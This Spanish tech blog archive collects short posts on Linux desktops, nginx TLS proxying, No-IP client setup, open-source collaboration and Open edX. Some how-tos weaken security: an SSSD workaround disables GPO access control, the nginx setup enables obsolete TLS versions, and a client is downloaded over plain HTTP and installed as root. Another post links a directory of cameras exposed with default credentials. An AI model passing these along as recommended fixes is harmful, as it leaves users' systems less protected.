Y que equivocación tan agradable, estoy realmente deseoso de probar hasta dónde puede llegar este paso que ha dado Microsoft para llevar su SGBD hasta el sistema operativo del pinguino.


Este es un breve artículo de primeras impresiones, no una revisión exhaustiva, como siempre, lo mejor es que lo probéis por vosotros mismos.

Pros

En general, la interfaz de usuario es limpia, moderna, pero vistosa y sencilla. Además muestra una combinación equilibrada de colores tanto en el fondo de escritorio como en el resto de elementos.

La integración de las aplicaciones de GNOME como el Visor de imágenes es buena y casi parece que fueron diseñadas para este escritorio.

Un apartado que me ha gustado bastante son los applets y las notificaciones, creo que han creado una solución simple y elegante que permite disponer de mucha información sin que ocupe espacio en el escritorio, algo que es de agradecer.

Contras

La verdad es que este apartado va a ser mucho más largo de lo que quisiera.

La integración con algunas aplicaciones como LibreOffice no es del todo correcta, al menos desde mi punto de vista.

La elección de Geary como cliente de correo frente a otras opciones más potentes como Thunderbird tampoco parece acertada.

La aplicación de calendario . En mi caso no pude conectar a una cuenta de Microsoft Exchange para sincronizar mis calendarios, lo que no es muy alentador.

Existen errores poco comprensibles, como que algunas aplicaciones se muestren en el idioma inglés a pesar de que el sistema esté configurado para el idioma español o que muestre temperaturas en grados Farenheit o distancias en millas. Parece un tontería, pero para muchos usuarios no lo es, y menos cuando se intenta ofrecer una imagen de sistema completo e integrado.

Resumen

En resumen, sinceramente me he quedado con un sabor agridulce, esperaba encontrarme con un producto que marcara alguna diferencia significativa respecto a los distintos sabores ya disponibles, pero realmente creo que solo veo un GNOME con una imagen diferente, pero que tampoco aporta nada que me haga sorprenderme. Además tiene algunos errores de bulto como los problemas de integración de las aplicaciones con el idioma español.

Esperemos que con su incorporación a la familia oficial de Ubuntu, se corrijan estas deficiencias y alcance un grado de madurez tan alto como sus hermanos mayores.

La solución al problema es bastante sencilla. Hay que iniciar una sesión con un usuario local y proceder a editar el fichero /etc/sssd/sssd.conf y añadir la línea ad_gpo_access_control = permissive. Tras reiniciar el servicio SSSD, ya podremos iniciar sesión en el equipo con las credenciales de Directorio Activo.

En mi caso el origen del problema era la aplicación de las GPO de la rama donde está el objeto del equipo, que estaba dejandome sin los suficientes permisos para poder acceder al equipo.

Aunque esta no sea la mejor solución del mundo, dado que arreglarlo me va a llevar algún tiempo pesto que no tengo claro qué GPO me está quitando los permisos, de momento me sirve como un apaño.

Si queréis más información sobre este tema, podéis consultar el enlace siguiente: https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/7/html/Windows_Integration_Guide/sssd-gpo.html{:target="_blank"}

En CodinGame he encontrado una de estas ayudas, y lo han conseguido generando ejercicios de programación clásicos como si fueran tareas parte del diseño de pequeños videojuegos.

Me parece una iniciativa muy positiva, y la verdad es que estoy enganchado a esta web mientras voy aprendiendo Python.

Os dejo el enlace: https://www.codingame.com/{:target="_blank"}

Más información: http://blogs.itpro.es/diazantuna/2016/03/11/windows-server-2016-containers{:target="_blank"}

1. Abre el fichero ~/.config/openbox/lubuntu-rc.xml
2. Añade el siguiente código entre las etiquetas <keyboard> y </keyboard>

 <keybind key="C-A-L">  
  <action name="Execute">  
   <command>lxlock</command>  
  </action>  
 </keybind>  

3. Por último ejecuta desde la consola el comando openbox --reconfigure.

Todo surge por una pregunta enviada por @Kalars07 a @lumia en #Twitter, y se ha armado el follón porque han confirmado que van a actualizar todos los dispositivos #Windows #Phone 8 a Windows 10. Una muy buena noticia después de ver como los usuarios de #WP7 se quedaban estancados cuando salió #WP8.

Si alguien me dice hace cinco años que Microsoft apostaría por abrir el core de .Net me hubiera reído en su cara. Buena noticia para los que apoyamos el software libre, pero habrá que ver cómo se desarrolla, que ya sabemos como se las gasta el gigante de Redmond a la hora de cumplir sus promesas.

El terror de cualquier gestor de proyectos, los proyectos “y ya que…”, proyectos que nunca se acaban y que siempre tienen tareas e hitos pendientes de realizar y cuando no, se añaden más. Una autentica pesadilla.

Mozilla ha publicado un navegador web que es una suite completa para desarrolladores, Firefox Developer Edition. No he podido probarla de momento, pero seguro que lo haré en breve, una buena excusa para retomar la programación web que tan olvidada tengo.

Si no te lo crees, en esta página web encontrarás más de 73000 cámaras abiertas al mundo con las credenciales por defecto del fabricante.

http://insecam.com/

Como todo lo que publico, el tutorial está pensado para ser utilizado en Ubuntu Server.

Instalar nginx

El primer paso es instalar nginx en el servidor, si no lo tenemos ya hecho.

sudo apt-get update
sudo apt-get install nginx

Crear un certificado

En mi caso, dado que es un servidor casero donde se usa, voy a generar un certificado autofirmado desde el propio equipo:

sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/nginx/cert.key -out /etc/nginx/cert.crt

Modificar la configuración

Vamos a modificar la configuración para que cuando un usuario se conecte por el puerto 443 mediante HTTP seguro, haga un proxy a la aplicación que escucha por el puerto 2000 en plano.

sudo vi /etc/nginx/sites-enabled/default

Dentro del fichero modificamos la configuración para que se parezca a esta:

server {
 listen 80;
 return 301 https://$host$request_uri;
 }
server {
listen 443;
 server_name xxxxx.yyyyy.zzz;
ssl_certificate /etc/nginx/cert.crt;
 ssl_certificate_key /etc/nginx/cert.key;
ssl on;
 ssl_session_cache builtin:1000 shared:SSL:10m;
 ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
 ssl_ciphers HIGH:!aNULL:!eNULL:!EXPORT:!CAMELLIA:!DES:!MD5:!PSK:!RC4;
 ssl_prefer_server_ciphers on;
access_log /var/log/nginx/miweb.access.log;
location / {
proxy_set_header Host $host;
 proxy_set_header X-Real-IP $remote_addr;
 proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
 proxy_set_header X-Forwarded-Proto $scheme;
# Fix the “It appears that your reverse proxy set up is broken" error.
proxy_pass http://localhost:8080;
proxy_read_timeout 90;
proxy_redirect http://localhost:8080 https://xxxxx.yyyyy.zzz;
 }
 }

Recargar la configuración y probar

Primero probamos que la configuración sea estructuralmente correcta y luego recargamos la configuración de nginx mediante los siguientes comandos:

nginx -t
service nginx restart

y probamos desde nuestro navegador a acceder a la URL https://miservidor/

El Instituto Nacional de Tecnologías de la Comunicación, S.A. (INTECO) ha pasado a llamarse INCIBE (Instituto Nacional de Ciberseguridad), al centrar todas sus funciones en el ámbito de la seguridad.

Aunque la máquina tiene instalada Ubuntu 14.04, el proceso que explico a continuación es valido para muchas otras distribuciones.

El primer paso, que ya se que no es recomendable, es elevar tus privilegios a root. Si no quieres hacerlo siempre puedes añadir sudo delante de los comandos que necesiten los privilegios.

sudo -i

Descargamos el paquete con el código fuente desde la propia web deNo-IP y proceder a descomprimirlo:

cd /usr/local/src/
wget http://www.no-ip.com/client/linux/noip-duc-linux.tar.gz
tar xf noip-duc-linux.tar.gz
ls

Accedemos al directorio que hemos descomprimido:

cd noip-2.1.9-1/

Compilamos e instalamos el binario:

make install

Durante el proceso de instalación nos preguntará por los parametros de configuración. Podemos indicar cualquier cosa porque volveremos a reconfigurar el cliente después de que termine de instarlo.

Una vez haya terminado de compilar e instalar el cliente ejecutaremos el siguiente comando para configurar el cliente:

/usr/local/bin/noip2 -C

Y se nos pedirán los siguientes datos:

Please enter the login/email string for no-ip.com xxxxxx
Please enter the password for user 'xxxxxx' ****************
Only one host [xxxxxxxxxx.xxxx.xx is registered to this account.
It will be used.
Please enter an update interval:[30] 
Do you wish to run something at successful update?[N] (y/N) n
New configuration file '/usr/local/etc/no-ip2.conf' created.

El siguiente paso es crear el servicio para que arranque automáticamente en el inicio del sistema operativo:

nano /etc/init.d/noip

Copiamos y pegamos esta configuración dentro del editor nano:

#######################################################
 #! /bin/sh
 case "$1" in
 start)
 echo "Starting noip2"
 /usr/local/bin/noip2
 ;;
 stop)
 echo -n "Shutting down noip2"
 for i in `noip2 -S 2>&1 | grep Process | awk '{print $2}' | tr -d ','`
 do
 noip2 -K $i
 done
 ;;
 *)
 echo "Usage: $0 {start|stop}"
 exit 1
 esac
 exit 0
 #######################################################

Para guardar las modificaciones lo hacemos con Ctrl+X. Ahora cambiamos los permisos del script y probamos su ejecución:

chmod 700 /etc/init.d/noip
sudo /etc/init.d/noip stop
sudo /etc/init.d/noip start

Editamos el fichero del proceso de arranque de Ubuntu:

nano /etc/rc.local

Ponemos en la línea por encima de la línea exit 0 el siguiente comando:

/etc/init.d/noip start

Para guardar las modificaciones lo hacemos con Ctrl+X. Y con este paso se finaliza la instalación. Para comprobar que está funcionando correctamente puedes probar con el comando nslookup para verificar que se actualiza correctamente la entrada DNS en los servidores de No-IP.

nslookup xxxxxxxxxx.xxxx.xx

La empresa informa que durante los últimos doce meses, la adopción de Nginx creció un 54 por ciento, con una cuota de mercado del 41%entre los 10.000 sitios web más concurridos. Durante los últimos cuatro años, la adopción de Nginx creció un 400% en total. Estas son las impresionantes estadísticas, pero lo que es tal vez más importante para la compañía es que su servicio comercial ahora cuenta con 250 clientes de pago, un crecimiento del 164 por ciento en el tercer cuatrimestre en comparación con el anterior. Robertson dijo que la compañía está viendo el impulso a través de una amplia variedad de industrias, incluyendo los mercados de la educación, los medios y entretenimiento, el comercio electrónico minorista, la tecnología y las finanzas.

“Estas cuentas buscan normalmente ofrecer aplicaciones que funcionen como los sitios web de consumo a gran escala, pero sin los costos de desarrollo y de ingeniería de la construcción de encargo un nivel de entrega de aplicaciones”,

señaló Robertson.

También dijo que cuando la compañía lanzó su primer servicio comercial, el enfoque inicial se centró en las aplicaciones web a gran escala. Eso funcionó bien, pero Robertson dijo que la compañía se dio cuenta rápidamente de que

“muchas aplicaciones no tienen que escalar como las aplicaciones web de monstruos pero quieren ofrecer una gran experiencia de usuario con tiempos de respuesta muy rápidos, máximo tiempo de actividad y capacidad móvil completa”.

A modo de ejemplo, citó una aplicación bancaria para los clientes de alta poder adquisitivo: la aplicación no ve una gran cantidad de tráfico, pero todavía tiene que ofrecer tiempos de respuesta muy rápidos para el control de los saldos de cuenta y confirmaciones comerciales.

En cuanto al futuro de Nginx, Robertson dijo que una de las principales tendencias que está viendo es la funcionalidad de red a nivel de aplicación “en movimiento inherente a la aplicación y lejos de la infraestructura subyacente y de la red.”

“El advenimiento de entornos de nube, equipos de devops y de tecnología como los contenedores Linux nos están impulsando a la verdadera abstracción de la aplicación. Es hora de que la funcionalidad de la aplicación que se ha ligado a la red en el pasado sea abstraída”, dijo.

Mientras que los servidores web están en el centro de esta tendencia, el equilibrio de carga, el almacenamiento en caché, el streaming de medios de comunicación y la seguridad son también una parte importante de la entrega de aplicaciones. Como era de esperar, Nginx ofrece ya la mayor parte de esta funcionalidad.

Enlace original en inglés: http://techcrunch.com/2014/10/16/Nginx-turns-10-usage-up-400-in-the-last-4-years

El nuevo sistema operativo de Microsoft, Windows 10, incluirá un gestor de paquetes al estilo Linux

La cadena británica Currys ha negado la garantía de compra de ordenadores de sobremesa a aquellos clientes que instalaron Linux en sus equipos

OneDrive is the one place for your files that you can access from virtually anywhere. Read our blog to hear the latest news and updates!

Londres va a llenar su mapa de puntos de recarga para smartphones denominados Solar Box, fundada por UnLtd, LSE Entrepreneurship y Siemens, cuya energía es solar a través de paneles y que incluye cuatro tomas. Estarán abiertas desde las 05:30 hasta las 11:30, 365 días al año. Y sí, serán gratuitas. La primera en Tottenham Court Road.

Recopilación con las mejores escenas de ‘The IT Crowd’, una comedia inglesa sobre dos informáticos que sufren para dar soporte en una empresa…

Drupal has patched a critical SQL injection vulnerability in version 7.x of the content management system that can allow arbitrary code execution.

Este conflicto empezó hace ya unos meses como un conato abortado sobre todo cuando desde Canonical se decidió acatar la decisión adoptada desde Debian, pero en estos últimos tiempos una coalición de desarrolladores, administradores y usuarios capitaneados por Ian Jackson que propugnan por volver a sysvinit, está tomando fuerza bajo el lema “hacer una cosa y hacerla bien“.

Estaremos atentos a lo que pase a partir de ahora y esperamos que se puede llegar a un consenso beneficioso para todas las partes.

Enlace: http://blog.desdelinux.net/systemd-vs-inteligencia/

Enlace: http://debianfork.org/

Enlace: https://wiki.ubuntu.com/UtopicUnicorn/ReleaseNotes

A website made by Veteran Unix Admins to organize and protest against the decision to impose SystemD to Debian users.

Ubuntu 14.10 ‘Utopic Unicorn’ y familia ya está disponible.

En su blog oficial Microsoft alerta de una nueva vulnerabilidad tipo “zero day” (“día cero”) que afecta a todos los sistemas operativos.

A esta limitadísima base de conocimientos se ha sumado una nueva certeza que se ha descubierto esta semana. Los gatos se sienten irremediablemente atraídos por el espacio delimitado.

El software libre en la educación ofrece ventajas para ampliar las posibilidades de aprendizaje de tus alumnos en el salón de clases.

The open source NGINX web server (and load balancer, HTTP cache and reverse proxy server) is turning 10 this month and its commercial counterpart, NGINX Plus..

Mozilla ha anunciado su servicio de vídeo conferencia y chat “Firefox Hello” el cuál ofrecerá opciones similares a la ofrecida por Skype pero con la diferencia de que será ejecutado directamente de…

The best developer tools, free for students. Get your GitHub Student Developer Pack now.

Se ha hecho esperar pero finalmente está aquí la versión final de Scientific Linux 7, clon a nivel binario de Red Hat Enterprise Linux 7 (RHEL 7) con una marcada deriva científica, como su nombre adelanta.

Te explicamos que son los sistemas Vehicle To Vehicle o Car To Car, cómo funcionan y qué ventajas de seguridad aportan a la conducción de…

¿Recuerdas los nostálgicos tiempos del MS-DOS? ¿Los precios del hardware? ¿Los diskettes? ¿Los virus? ¿El PC Speaker? Vamos a dar una vuelta al pasado.

Normalmente nos paramos a hablar sobre pantallas, bastante sobre las que son grandes, y en mayor medida sobre las que tienen nuestros dispositivos…

Descubre itch.io, todo un templo para los desarrolladores indie con más de 500 juegos totalmente gratuitos para Linux.

Un nuevo proyecto crowdfunding bautizado como Anonabox permitirá pasar todas las conexiones de datos de nuestro equipo informático a través de Tor, mejorando la privacidad y el anonimato incluso al usar aplicaciones de mensajería o correo electrónico. El dispositivo tiene un precio de 45 dólares.

Trabajo para una empresa de código abierto en un proyecto de código abierto y todavía me encuentro a diario que las personas que están trabajando en el software de código abierto prefieren trabajar en privado (de vez en cuando). No discuten cuestiones técnicas sobre las listas de correo públicas, la conversación normal, se hace en las salas de chat internas en lugar del IRC público, y las nuevas características son más bien demostradas en canales de vídeoconferencia privadas como por ejemplo, Hangout on Air. Por supuesto, hay buenas razones por las que la comunicación tiene que ser en privado: si los clientes o los datos de los clientes están involucrados, entonces (sobre todo para una empresa pública) se necesitan conversaciones privadas. De forma similar para las cifras de ventas u otros aspectos financieros. Aunque la realidad es que los ingenieros la mayoría de las veces no hablan sobre cifras de ventas. Y la mayoría de los casos de los clientes son sólo problemas de softwaregenerales que se pueden discutir abiertamente mientas que no se mencione el nombre del cliente. Lo que me lleva a la pregunta de por qué las personas no están colaborando abiertamente, sobre todo cuando el código fuente resultante se publique en un repositorio público como GitHub.

El miedo a la fuga

Cuando se trabaja con los clientes, siempre hay grupos como la atención al cliente que no pueden trabajar abiertamente, lo que significa que no se unen a los canales de IRC públicos, sino a privados para mantener los datos de los clientes en privado. Los ingenieros que trabajan en este tipo de casos de clientes siempre pueden tener un miedo latente a que al discutir los detalles del caso puedan filtrarse datos de los clientes y los debates sobre ellos siempre suceden en los canales internos, no importa si cualquier cuestión específica del cliente se discute o no. Lo que me lleva al siguiente punto.

El esfuerzo de selección y conmutación

Cuando se trabaja en los canales internos con datos relacionados con los clientes (y porque los respectivos colegas sólo están disponibles de esa manera), uno tiene que pensar y decidir si un determinado mensaje puede ir a los canales públicos o no constantemente. Uno puede entender que este tipo de comentarios de casos se realizan en los canales internos y para conseguir un flujo coherente de pensamiento se debe permanecer en el canal interno. Las conversaciones sobre otros temas no relacionados con los clientes deben, al contrario, ir a los canales públicos, lo que significa cambiar de canal todo el tiempo. Dicha selección y conmutación de canales sin duda es un esfuerzo que la gente trata de evitar.

Incertidumbre

También puede haber casos en los que los ingenieros están trabajando en una solicitud de función o un fallo (bug) de un cliente que no es específico de cualquier cliente en absoluto. Y todavía hay una incertidumbre persistente sobre si el trabajo puede ser discutido abiertamente o no. Así que en caso de duda la discusión ocurre nuevamente en privado.

El miedo a la distracción

Mientras que la contribución comunitaria es (se dice que es) siempre bienvenidas, también puede ser visto como una fuente de distracción. Un miembro central de un proyecto posiblemente tenga que interrumpir su trabajo, empezar a pensar en el punto de vista del miembro de la comunidad, y luego volver al trabajo anterior. Esto puede ser de vez en cuando una distracción, especialmente cuando se tienen algunos lanzamientos programados (time boxed releases), por lo que esto puede no ser bienvenido.

La percepción de falta de beneficio

Nuestro proyecto tiene una parte bastante pequeña de la comunidad, lo que puede plantear la pregunta ¿por qué discutir las cosas en público si nadie parece interesado? ¿Por qué pasar a través de todos los aros anteriores? ¿Un árbol realmente cae en el bosque si no hay un observador?

La falta de confianza en sí mismo

Otra posible razón puede ser un miedo a la rendición de cuentas y la trazabilidad. Esto puede sonar gracioso en un primer momento dado que el código fuente termina en el repositorio público. La causa subyacente aquí puede ser una falta de confianza en uno mismo. Las discusiones en público que se registran como registros de chat, los vídeos de demostraciones de funciones, o las entradas de una bitácora permiten que otros den retroalimentación crítica y puede hacer que la persona se sienta insegura. Yo soy un firme creyente de que el trabajo en el abierto es bueno. Incluso con una pequeña comunidad. Hacer el trabajo abiertamente permite obtener el aporte de los miembros de la comunidad, lo que enriquece el conocimiento del dominio del problema. Otros dan una perspectiva totalmente diferente y, probablemente, indiquen casos de uso en los que nunca ha pensado. Además, si los miembros de la comunidad se incluyen en la comunidad en general, se sienten mejor y empezar a contribuir más. Para obtener ideas sobre cómo contribuir en formas distintas de código, vea el artículo: 10 maneras de contribuir a un proyecto de código abierto sin necesidad de escribir código.

Mis encuentros con miembros de la comunidad han sido muy buenos, como todo el mundo es muy amable y reunirse con miembros de la comunidad en persona es siempre divertido. Entonces, ¿qué podemos hacer para superar los obstáculos que he enumerado anteriormente?

• En primer lugar, establecer una política sobre que toda comunicación tiene que estar en los canales públicos de forma predeterminada a menos que existan buenas razones en contra.
• Recuérdese a sí mismo comenzar el día en los canales públicos. Cuando se se empieza allí, se establece una especie de defecto para uno mismo. Y anima a otros a charlar allí también, por lo que la construcción de una masa crítica para conseguir que las conversaciones continúen.
• Recuerde a la gente de vez en cuando acerca de la política anterior.
• Disocie la información del cliente de la información técnica tan pronto como sea posible. Tal vez directamente en el nivel de la persona de soporte. Un NullPointerException es un NPE no importa si es reportado por un cliente que paga o por un miembro de la comunidad.
• Registre los canales públicos para que los miembros de la comunidad tengan la posibilidad de volver a leer lo que se discutió.
• Si tiene que trabajar en silencio, entonces no deje fuera únicamente a la comunidad externa. Interrumpa las comunicaciones externas, haga su trabajo y luego regrese – la distracción es una distracción, no importa si proviene de otra persona de la comunidad o de un compañero de trabajo.
• Si se siente incómodo escribiendo (por ejemplo, una entrada de bitácora que explica su trabajo o una nueva característica) primero pásasela a otra persona de tu confianza. A menos que usted ni siquiera intente ofrecer un buen resultado, no hay mensajes malos. La mejor comunidad siempre agradece cualquier información adicional.

Traducido del original en inglés: http://opensource.com/business/14/10/why-work-open

Hewlett-Packard Enterprise Will Define the Next Generation of Technology Infrastructure, Software and Services for the New Style of IT HP Inc. Will.

HP se separa oficialmente en dos empresas,  una HP Inc. dedicada a PCs e impresoras, y otra, llamada HP Enterprise dedicada a empresas y servicios.

Google contra Facebook por la supremacía en la mensajería instantánea, ¿será capaz esta vez de batir a la bestia?

A Microsoft se le ha ido la mano con los términos de uso de la Technical Preview de Windows 10. Solo falta que le demos las llaves de casa. Muy mal por Microsoft :-(

Iain Heath es el autor de este cuidado y preciosista diorama de DOOM recreado con Legos que, francamente, raya a un gran nivel.

Sería mejor si usaran poco azúcar en vez de reducir un poco el montón enorme que usan, pero al menos es algo.

Nuevos datos confirmarían la existencia el Nexus 6 y las especificaciones de las que se han hablando, entre ellas su pantalla de 6 pulgadas.

Sitios inolvidables para perderse por ellos explorando un trozo de la historia de Europa.

No es por hacer publicidad del tabaco, pero este artículo sobre los cigarrillos en China me ha perecido muy interesante aunque solo sea por aprender sobre las costumbres de ese país.

Un trozo de nuestra historia que todo el mundo debería conocer. El primer asentamiento europeo en EE.UU. fue una fortaleza española.

Son tan bonitos que casi no sabes si Miyazaki se inspiró en ellos o crearon estos sitios inspirados en Miyazaki

Obtén información sobre la versión Technical Preview de Windows, descárgala y echa un vistazo al futuro de Windows.

A 5000-year-old water system has been unearthed during the second season of a rescue excavation project at the Farash ancient historical site at the Seimareh Dam reservoir area in western Iran.An a

Pobrecito, menos mal que ha caído en manos de una buena persona que está cuidando de él.

A ver si alguien es capaz de explicarnos cómo pueden colisionar dos cargueros dentro del Canal de Suez. Un fallo garrafal que no solo ha tenido grandes costes económicos sino que podría haber costado vidas humanas.

OCU denuncia esta sorprendente mala practica por parte de las empresas de telefonía

okyo based artist Satoshi Araki creates miniature dioramas of chaotic cityscapes that are the result of urban decay or warfare, with amazing detail. Araki’s work is based on images he found on the Internet, explaining how he uses Google image search to look for images from the “Iraq war” and “Iraq ruins”. Araki uses Styrofoam board which he cuts, paints and glues them together to create the scene and populates them with plastic models of cars and scooters.

http://www.telegraph.co.uk/earth/wildlife/11123365/Giant-flesh-eating-leech-filmed-swallowing-huge-earthworm-like-spaghetti.html

For the first time a giant, 50cm long, leech has been filmed swallowing a huge blue earthworm in the forests of Borneo for new BBC documentary Wonders of the Monsoon

Huevos de Pascua que se encuentran dentro del buscador de Google.

Cuidado con estos gatos que vienen pisando fuerte. Muy buena parodia de Assassin’s Creed Unity para pasar un rato divertido

Por muy idílico que sea un sitio, crear una ciudad en la mitad del desierto es antinatural y es lógico que la gente se resista a mudarse a un lugar así.

Mi primer trabajo a tiempo completo fue como profesor de inglés. Enseñé a los niños japoneses a pasar sus exámenes de acceso a la universidad. Para ellos el fracaso a menudo significaba todo un año adicional de estudio para realizar esos mismos exámenes de nuevo la próxima vez. Unos años más tarde, enseñé en Australia, ayudando a los estudiantes asiáticos a aprobar los exámenes en idioma inglés para que pudieran mantener sus plazas universitarias. Si fracasaban, a menudo se arriesgaban a perder sus visados de permanencia y a ser enviados de vuelta a su país.

Después de llegar a Georgia, trabajé en una escuela secundaria en el área de Atlanta. Nos dijeron que enseñáramos para superar el examen. Y, cuanto más se esforzaban los chicos, más nos dijeron que enseñáramos para superar el examen. Si los estudiantes no superaban el curso y tenían que asistir a la escuela de verano, la regulación se salía de las escalas. Cada profesor de la escuela de verano tenía que asegurarse de que estaba en la misma página del mismo libro, todos los días.

Y, no estoy solo. La mayoría de los maestros tienen historias similares de presiones hacía los estudiantes y los profesores.

Libertad para pruebas

En 2006, cambié de rumbo. Dejé de ser un maestro normal y dejé de enseñar para el examen. Comencé a dar clases de código abierto y creé una compañía llamada Open Source Training.

La enseñanza de código abierto ha sido un soplo de aire fresco para mí y para muchos de nuestros estudiantes ya que con la forma de código abierto, no hay pruebas oficiales. No hay certificación oficial para la mayoría de los proyectos de código abierto. Y, no hay libros de texto prescritos.

En código abierto, ningún empresario para el que valga la pena trabajar le pedirá una prueba oficial de sus habilidades. Un buen empleador verá lo que has hecho y te pedirá que demuestres lo que puedes hacer. Sí, todavía ayuda tener un Grado en Informática, pero la falta de uno a menudo no supone un inconveniente.

Muchos de nuestros estudiantes vienen a clase habiendo aprendido por si mismos. Con el código abierto, no hay derechos de licencia a pagar, no hay costos de exámenes, y no hay libros de texto para comprar. Puedes simplemente descargar el software y empezar. Esto nunca podría suceder con las plataformas clásicas, altamente licenciadas, en las que había la necesidad de persuadir a un “representante de ventas de la empresa” para que te diera una clave de licencia. Si enseñamos mediante plataformas como WordPress, ahora es normal encontrarse conque los estudiantes también utilizan el software para el tiempo libre. Lo usan para sus pasatiempos, equipos deportivos, organizaciones no lucrativas, comerciales, grupos religiosos, y mucho más. Los estudiantes lo han hecho por su propia cuenta. Han hecho la investigación, seleccionaron lo que querían usar, y pusieron la pelota a rodar por sí mismos.

Mejores incentivos

Con el aprendizaje de código abierto, los incentivos son radicalmente diferentes. Los estudiantes no siguen nuestra formación porque quieran saltar una barra que alguien haya puesto. Los estudiantes quieren saltar barras que ellos hayan puesto. Estas son algunas de las cosas que los estudiantes han hecho después de su formación:

• Empezaron sus propias agencias de diseño web.
• Fueron a trabajar para las grandes agencias de diseño web ya existentes.
• Crearon sitios para las organizaciones de su comunidad.
• Utilizaron software de código abierto para ayudar a su propio negocio.
• Utilizaron software de código abierto para mantener su trabajo o conseguir una promoción.
• Los estudiantes trabajan duro para lograr grandes cosas, pero eligen los objetivos con los que se sienten cómodos. Esto no es inusual.

Cuando era niño, los profesores seguían diciendo:

Continúe el aprendizaje, la carrera que tendrá no se ha inventado todavía.

Bueno, ahora estamos viviendo en un mundo donde nuestro próximo trabajo puede incluso no se han inventado todavía. El modelo anticuado de basado en exámenes no puede adaptarse con la suficiente rapidez o proporcionar los incentivos adecuados. El software de código abierto es flexible, se está fortaleciendo, y se mueve al ritmo que los estudiantes necesitan. Se ve mucho más como el futuro de la educación.

Traducido del original:http://opensource.com/education/14/9/teachers-students-want-freedom-testing

En esta entrevista, se habló con Ned Batchelder de Open edX acerca de su equipo (foto de abajo, Ned va de azul) en la que dice que están trabajando para hacer de la plataforma

“el mejor lugar paraexperimentar con nuevas ideas, y luego compartir esas ideas con otros educadores que puedan basarse en ellas y hacer sus propias mejoras”.

Vamos a ver cómo están planeando llegar a esa meta.

¿Por qué siente los sitios que ejecutan Open edX han optado por hacerlo?

Creo que los educadores eligen Open edX porque están buscando una plataforma que ofrezca un gran conjunto de herramientas de partida (evaluaciones sostificadas, creación de contenido de fácil de uso, etcétera), pero que también les dé la posibilidad de ampliar la plataforma. La API XBlock les permite construir nuevos componentes interactivos para sus cursos. Pero más allá de nuestras APIs, toda la plataforma es de código abierto, por lo que no están limitados por lo que hemos elegido ofrecer.

Pueden extenderlo como desean probar nuevas ideas. El objetivo de edX es más grande que llevar la educación libre al mundo. Queremos permitir a los expertos en educación que experimenten con la mejor manera de enseñar en línea. Muchos profesores que enseñan MOOC sestán interesados ​​no sólo en la enseñanza de su curso, pero en el estudio del proceso de aprendizaje en línea. Tienen experiencia con los primeros proveedores de educación en línea y entienden sus limitaciones. Quieren probar nuevas técnicas de enseñanza y necesitan una plataforma que les permita hacerlo.

La tenencia del código fuente es aún más importante en un entorno educativo: las leyes de privacidad del estudiante a menudo ponen restricciones geográficas acerca de donde los datos se pueden hospedar. Las instituciones tienen mayor flexibilidad en la elección en la forma de alojar su instalación de Open edX debido a que tienen acceso completo a todo el código. Pueden crear una estrategia de alojamiento para ajustarse a las leyes más estrictas. Por último, algunas instituciones sólo se sienten más a gusto con el código abierto proporcionado por una organización sin animo de lucro; algo que se ajusta culturalmente con las universidades.

¿Cómo tú y tu equipo abordáis la tarea de construir una plataforma de software para estas organizaciones?

Al igual que con la construcción de cualquier producto de software, es una cuestión de entender a los usuarios, entender las necesidades que tienen en común, y construir características que apoyen esas necesidades. edX tiene la ventaja de contar con decenas de instituciones de primer nivel como miembros del consorcio. Tenemos una estrecha relación con sus equipos de instrucción, así que tenemos un montón de buena información y comentarios acerca de dónde quieren que vaya la plataforma.

La comunidad de código abierto ofrece más datos, especialmente sobre sus necesidades que difieren, por ejemplo, porque están organizandosus propios casos, en lugar de la realización de cursos en edx.org. En su mayor parte, los ingenieros de edX no son expertos en educación, que son directamente ingenieros de software. Pero eso genera un buen equilibrio: podemos construir la infraestructura de software, guiada por el aporte de los educadores, a continuación, los educadores pueden aprovechar y ampliar la plataforma con componentes especializados. Del mismo modo, los desarrolladores académicos pueden no haber hecho frente a los desafíos de software a los que estamos acostumbrados en un sitio de la tamaño de edx.org.

Tenemos casi 3 millones de usuarios, que no es del tamaño de Facebook, pero es mucho más grande que un proyecto tipo campus. Así que tratamos de unir a los dos dominios: proporcionamos conocimientos de software y las universidades aportarán su experiencia educativa. Puede ser difícil, pero estamos aprendiendo a hablar los lenguajes de los demás, y tratar de diseñar procesos que se acomoden a la mezcla inusual. Los resultados valen la pena.

¿Qué roles asumen en su equipo?

Yo soy un miembro de los dos equipos. El primero es toda la organización de ingeniería edX. Debido a que todo el código que producimos es de código abierto, cada ingeniero juega un papel en la producción de la plataforma abierta edX. El otro equipo es el equipo Open edX. Estamos acusados ​​de permitir, alentar, y el crecimiento de la comunidad Open edX. En estos momentos somos tres personas pero ¡estamos contratando! Los tres somos ingenieros de profesión, pero con un amor de código abierto y con un aprecio por el valor de estar cara a cara con la gente … ¡incluso si es sólo un cara a cara en la pantalla!

A medida que el equipo crece, vamos a tener personas que tendrán funciones puramente de comunicación y coordinación y también gente que es más técnica, para la construcción de grandes características de interés para la comunidad de código abierto. Toda la organización está muy entusiasmada con que Open edX sea de código abierto, el trabajo especial de mi equipo es ayudar a mantener el mundo del código abierto en la parte superior de la mente, para ser sus defensores dentro de la empresa, y para identificar y corregir los puntos de fricción.

¿Cómo nivelará tu equipo las ideas de los educadores?

Hay dos maneras en las que podemos utilizar sus ideas.

La primera es incorporarlos como características en la propia plataforma Open edX. Esto requiere los procesos típicos de productos de software: extenso diseño y planificación, implementación, prueba, y así sucesivamente. Sólo las características más ampliamente interesantes se pueden construir de esta manera porque estamos limitados en la cantidad que podemos producir. Tenemos que encontrar el bien común y construir características para apoyarlas. La segunda manera es que podemos construir APIs que permiten a los equipos de instrucción práctica implementar sus propias ideas para sus propios cursos. Esta es una mejor opción para las ideas más especializadas que sólo se aplican a ciertos dominios, o son más especulativos.

¿Cómo pueden los educadores aprender más sobre la educación abierta y en línea?

Los equipos académicos pueden implementar nuevas herramientas para la educación y probarlos en Open edX. Hemos construido la mayor parte de la plataforma (¡incluyendo las partes aburridas!), y ellos han construido la herramienta pedagógica interesante en la parte superior. ¡Eso suena como una asociación para mí!

